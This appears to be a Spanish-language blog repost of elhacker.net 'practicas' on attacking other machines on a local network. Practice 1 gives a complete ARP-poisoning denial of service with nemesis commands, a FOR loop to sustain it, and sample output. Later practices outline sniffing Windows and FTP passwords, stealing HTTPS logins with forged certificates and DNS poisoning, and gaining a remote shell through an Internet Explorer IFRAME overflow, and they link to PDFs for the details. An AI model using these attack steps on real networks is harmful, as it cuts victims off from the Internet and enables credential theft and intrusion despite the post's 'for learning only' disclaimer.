Nota: Lo que viene a continuacion es solamente dirijido hacia el aprendizaje! No me hago responsable de su mal uso, ya que este post no me pertenece y lo he distribuido solo para su APRENDIZAJE! La fuente la encontrareis al final.



Practica 1 - Negación de servicios de Internet a otro equipo de la red local


Teoría:

El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce su dirección IP, q es traducida a dirección MAC a través del protocolo ARP. Por tanto, en última instancia, el equipo víctima accede a Internet mandando paquetes hacia la dirección MAC del router. Si el equipo atacante logra engañar al equipo víctima, haciendole creer q la dirección MAC del router es otra inexistente, el equipo víctima no podrá llegar al router, esto es, no podrá llegar a Internet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando la identidad del router y diciéndole al equipo víctima q debe actualizar su tabla ARP con la nueva dirección MAC inexistente.


Aplicación práctica:

Envenenamiento ARP


Escenario:

Atacante: 10.10.0.69
Víctima: 10.10.0.254
Router / Puerta de Enlace: 10.10.0.33


Herramientas:

Vamos a utilizar el inyector de paquetes Némesis @ http://www.packetfactory.net/projects/nemesis/
Más información sobre Nemesis en http://foro.elhacker.net/index.php/topic,33197.0.html


Procedimiento:

1º Obtener las direcciones MACs de los equipos víctima y router a través de sus direcciones IP. Para ello, hacemos un ping a ambos equipos.

2º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a través del comando arp -a


C:\>arp -a

Interfaz: 10.10.0.69 --- 0x2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.254           00-20-18-b0-06-df     dinámico

C:\>

3º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima...


C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 --- 0x2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

4º Verificar que la víctima tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima...


C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241
Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237
Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237
etc.

5º Inyectar desde el atacante el paquete malicioso que envenena la tabla caché ARP de la víctima con la MAC errónea del router.

Sintaxis de la inyección: nemesis arp -D IPvictima -S IProuter -H MACrouter


C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>

6º Obtener la tabla caché ARP de direcciones IP/MAC envenenada en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima...



C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 --- 0x2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            aa-bb-cc-dd-ee-ff     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

7º Verificar que la víctima NO tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima...



C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238
etc.

Como podéis observar, después de cierto tiempo, el sistema Windows de la víctima refrescará su tabla caché ARP con la verdadera dirección MAC del router y, entonces, sí que dispondrá de conexión Internet. Se fastidió el invento?? Noooo... si estamos continua y periódicamente envenenando la tabla caché ARP de la víctima desde el equipo atacante.
Para ello, inyectamos el paquete con Nemesis desde un bucle FOR:


C:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

etc.

De esta forma, la víctima no dispondrá de conexión a Internet mientras dure el bucle FOR del atacante...



Practica 2 – Obtener la contraseña de Windows de un usuario de nuestra red local.


Teoría:

El equipo atacante coloca un Sniffer a la escucha, de forma que es capaz de capturar todo el tráfico que pasa por su tarjeta de red. Cuando un usuario víctima inicia sesión en el equipo atacante para acceder a sus recursos compartidos, el Sniffer captura el hash desafío-respuesta intercambiado y después de crackearlo por fuerza bruta, se obtiene la contraseña de Windows del usuario víctima que inició sesión en el equipo atacante.


Aplicación práctica:

Sniffado



Descargar documento: (Guardar destino como...)

http://www.geocities.com/unrayodesoul/gospel/Practica.2.Sniffar.Password.Windows.byGospel.pdf

Mirror @ Brujo's: http://ns2.elhacker.net/timofonica/manus/Practica.2.Sniffar.Password.Windows.byGospel.zip



Practica 4 – Obtener la contraseña de acceso a un Servidor FTP situado en Internet al que no tenemos acceso autorizado.


Teoría:

Sea un Servidor FTP situado en Internet tal que el atacante no tiene acceso autorizado porque desconoce una cuenta de usuario y contraseña válidas en el Servidor. Asimismo, el Servidor tampoco acepta acceso anónimo.
Sin embargo, el atacante sabe que cierto usuario víctima de su red local sí que tiene acceso autorizado al Servidor FTP.
El atacante puede sniffar la contraseña de acceso durante el proceso de autenticación del usuario víctima en el Servidor FTP.

En el caso de una red local compartida (hubs), sólo es necesario sniffar todos los paquetes que pasen por nuestra tarjeta de red, que serán los mismos que circulen por la red. De esta forma, cuando el usuario víctima inicie sesión, el paquete que contiene la contraseña de acceso será enviada a todos los equipos conectados al concentrador, entre ellos, nuestro equipo.

En el caso de una red local conmutada (switches), el tráfico entre el usuario víctima y el Servidor FTP sólo circulará entre el equipo de la víctima y el router (puerta de enlace) que permite acceder a Internet para conectarse con el Servidor FTP. El atacante debe alcanzar una posición de Man in the Middle si quiere ser capaz de sniffar este tráfico durante la conexión. A fin de lograr esta posición, el atacante debe envenenar las tablas ARP del equipo víctima y del router (puerta de enlace), de modo que el tráfico circule a través de su equipo: Víctima <-> Atacante <-> Router <-> Servidor FTP.


Aplicación práctica:

Envenenamiento ARP + Sniffado


Descargar documento: (Guardar destino como...)

http://www.geocities.com/unrayodesoul/gospel/Practica.4.Sniffar.Password.FTP.enInternet.byGospel.pdf

Mirror @ Brujo's: http://ns2.elhacker.net/timofonica/manus/Practica.4.Sniffar.Password.FTP.enInternet.byGospel.zip



 Practica 5 – Obtener la contraseña de acceso a un Servicio protegido con protocolo seguro HTTPS al que no tenemos acceso autorizado.


Teoría:

El protocolo HTTPS se utiliza en sitios web que requieren seguridad en el acceso, de forma que se establece una sesión cifrada entre cliente y servidor para que la información crítica (contraseñas) no pueda ser leída por terceros. Esta conexión HTTPS requiere la existencia de un certificado válido de servidor verificado por una CA (Autoridad Certificadora).
El equipo atacante va a situarse como Man in the Middle entre el equipo víctima y el router (puerta de enlace) de forma que todo el tráfico circule por él. Cuando el usuario víctima trate de conectarse a un sitio web como Hotmail o Yahoo, utilizando protocolo HTTPS, realizará una petición de certificado válido de servidor que será servida por el equipo atacante. Al tratarse de un certificado falseado, es posible que la víctima inspeccione y rechace el certificado, y por tanto, no se produzca el inicio de sesión. Pero también es muy posible que la víctima acepte el certificado falseado, sin siquiera leerlo, y el Sniffer situado en el equipo atacante capture el usuario y contraseña de la sesión segura HTTPS.


Aplicación práctica:

Envenenamiento ARP + Envenenamiento DNS + Sniffado


Descargar documento: (Guardar destino como...)

http://www.geocities.com/unrayodesoul/gospel/Practica.5.Sniffar.Password.HTTPS.Hotmail.byGospel.pdf

Mirror @ Brujo's: http://ns2.elhacker.net/timofonica/manus/Practica.5.Sniffar.Password.HTTPS.Hotmail.byGospel.zip



Practica 6 – Obtener una shell remota cuando la víctima accede a Internet con el navegador Microsoft Internet Explorer.


Teoría:

El día 2 de Noviembre de 2004 se publicó en Bugtraq una vulnerabilidad que afectaba al navegador Microsoft Internet Explorer 6.0 instalado en Windows 2000 o Windows XP con cualquier Service Pack, excepto XP/SP2.
La vulnerabilidad, del tipo buffer overflow, se produce al introducir cadenas demasiado largas en las propiedades SRC y NAME de las etiquetas <FRAME> e <IFRAME>.

Tras la publicación de un exploit .html malicioso para la vulnerabilidad, cierto atacante puede situarse como Man in the Middle entre el equipo víctima y el router (puerta de enlace) y envenenar la traducción DNS, de forma que cuando la víctima quiera acceder a cierta URL, la petición sea redireccionada al .html malicioso instalado en un servidor HTTP cómplice del atacante.
Cuando la víctima descargue el .html malicioso en su navegador IE, se explotará la vulnerabilidad, permitiendo que el atacante pueda obtener una shell remota.


Aplicación práctica:

Manipulación de Shellcodes
 Explotación de vulnerabilidades en Microsoft Internet Explorer
Envenenamiento ARP + Envenenamiento DNS


Descargar documento: (Guardar destino como...)

Parte 1: Exploit con Shellcode Bind Port 28876

http://www.geocities.com/unrayodesoul/gospel/Practica.6.Shell.Remota.con.Vuln.IE.IFRAME.Parte.1.byGospel.pdf

Mirror @ Brujo's: http://ns2.elhacker.net/timofonica/manus/Practica.6.Shell.Remota.con.Vuln.IE.IFRAME.Parte.1.byGospel.zip



Practica 7 – Obtener una shell remota cuando la víctima accede a Internet con el navegador Microsoft Internet Explorer.


Descargar documento: (Guardar destino como...)

Parte 2: Exploit con Shellcode Reverse Shell

http://www.geocities.com/unrayodesoul/gospel/Gospel.feat.LoReDo-Intrusion.en.Redes.Locales.con.Exploit.IFRAME.pdf

Mirror @ Brujo's:
http://ns2.elhacker.net/timofonica/manus/Gospel.feat.LoReDo-Intrusion.en.Redes.Locales.con.Exploit.IFRAME.zip


Fuente: ElHacker.com

Publicar un comentario

 
Top